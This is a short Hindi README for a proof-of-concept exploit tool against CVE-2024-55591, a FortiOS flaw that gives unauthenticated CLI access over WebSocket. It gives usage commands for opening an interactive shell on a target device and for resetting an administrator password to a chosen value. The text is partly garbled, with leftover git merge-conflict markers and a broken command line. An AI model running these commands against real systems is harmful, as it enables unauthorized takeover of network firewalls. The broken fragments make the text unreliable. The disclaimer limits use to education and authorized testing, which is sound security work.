
CVE-2024-55591 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, FortiOS उपकरणों तक अप्रमाणित WebSocket CLI पहुंच सक्षम करना, इंटरैक्टिव शेल और व्यवस्थापक पासवर्ड रीसेट के साथ।
<<<<<<< HEAD
=======
यह CVE-2024-55591 के शोषण के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) टूल है, जो FortiOS में एक कमजोरी है जो WebSocket के माध्यम से CLI तक अप्रमाणित पहुंच की अनुमति देती है।
--reset-user)python3 poc.py --host <target_ip> --port 443 --ssl
फिर प्रॉम्प्ट का उपयोग करें:
FortiOS# get system status
FortiOS# exit
python3 poc.py --host <target_ip> --port 443 --ssl \
--reset-user Admin2 --new-pass Forti2024!
अस्वीकरण: यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
4fe5de8 (Add full PoC and README for CVE-2024-55591 by @cherny_zhizn)